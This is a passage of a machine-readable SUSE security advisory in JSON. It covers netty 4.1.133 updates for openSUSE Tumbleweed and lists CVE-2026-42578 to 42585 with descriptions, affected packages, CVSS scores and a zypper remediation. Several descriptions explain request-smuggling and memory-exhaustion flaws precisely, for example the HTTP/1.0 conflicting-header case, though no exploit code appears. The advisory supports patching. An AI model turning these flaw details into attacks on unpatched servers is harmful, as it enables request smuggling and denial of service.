"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42578"
},
{
"cve": "CVE-2026-42579",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42579"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty\u0027s DNS codec does not enforce RFC 1035 domain name constraints during either encoding or decoding. This creates a bidirectional attack surface: malicious DNS responses can exploit the decoder, and user-influenced hostnames can exploit the encoder. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42579",
"url": "https://www.suse.com/security/cve/CVE-2026-42579"
},
{
"category": "external",
"summary": "SUSE Bug 1265272 for CVE-2026-42579",
"url": "https://bugzilla.suse.com/1265272"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.2,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42579"
},
{
"cve": "CVE-2026-42580",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42580"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty\u0027s chunk size parser silently overflows int, enabling request smuggling attacks. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42580",
"url": "https://www.suse.com/security/cve/CVE-2026-42580"
},
{
"category": "external",
"summary": "SUSE Bug 1265273 for CVE-2026-42580",
"url": "https://bugzilla.suse.com/1265273"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42580"
},
{
"cve": "CVE-2026-42581",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42581"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpObjectDecoder strips a conflicting Content-Length header when a request carries both Transfer-Encoding: chunked and Content-Length, but only for HTTP/1.1 messages. The guard is absent for HTTP/1.0. An attacker that sends an HTTP/1.0 request with both headers causes Netty to decode the body as chunked while leaving Content-Length intact in the forwarded HttpMessage. Any downstream proxy or handler that trusts Content-Length over Transfer-Encoding will disagree on message boundaries, enabling request smuggling. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42581",
"url": "https://www.suse.com/security/cve/CVE-2026-42581"
},
{
"category": "external",
"summary": "SUSE Bug 1265277 for CVE-2026-42581",
"url": "https://bugzilla.suse.com/1265277"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42581"
},
{
"cve": "CVE-2026-42582",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42582"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final, when decoding header blocks, the non-Huffman branch of io.netty.handler.codec.http3.QpackDecoder#decodeHuffmanEncodedLiteral may execute new byte[length] for a string literal before verifying that length bytes are actually present in the compressed field section. The wire encoding allows a very large length to be expressed in few bytes. There is no check that length \u003c= in.readableBytes() before new byte[length]. This vulnerability is fixed in 4.2.13.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42582",
"url": "https://www.suse.com/security/cve/CVE-2026-42582"
},
{
"category": "external",
"summary": "SUSE Bug 1265318 for CVE-2026-42582",
"url": "https://bugzilla.suse.com/1265318"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42582"
},
{
"cve": "CVE-2026-42583",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42583"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Lz4FrameDecoder allocates a ByteBuf of size decompressedLength (up to 32 MB per block) before LZ4 runs. A peer only needs a 21-byte header plus compressedLength payload bytes - 22 bytes if compressedLength == 1 - to force that allocation. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42583",
"url": "https://www.suse.com/security/cve/CVE-2026-42583"
},
{
"category": "external",
"summary": "SUSE Bug 1265279 for CVE-2026-42583",
"url": "https://bugzilla.suse.com/1265279"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42583"
},
{
"cve": "CVE-2026-42584",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42584"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpClientCodec pairs each inbound response with an outbound request by queue.poll() once per response, including for 1xx. If the client pipelines GET then HEAD and the server sends 103, then 200 with GET body, then 200 for HEAD, the queue pairs HEAD with the first 200. The HEAD rule then skips reading that message\u0027s body, so the GET entity bytes stay on the stream and the following 200 is parsed from the wrong offset. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42584",
"url": "https://www.suse.com/security/cve/CVE-2026-42584"
},
{
"category": "external",
"summary": "SUSE Bug 1265280 for CVE-2026-42584",
"url": "https://bugzilla.suse.com/1265280"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-42584"
},
{
"cve": "CVE-2026-42585",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42585"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty incorrectly parses malformed Transfer-Encoding, enabling request smuggling attacks. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
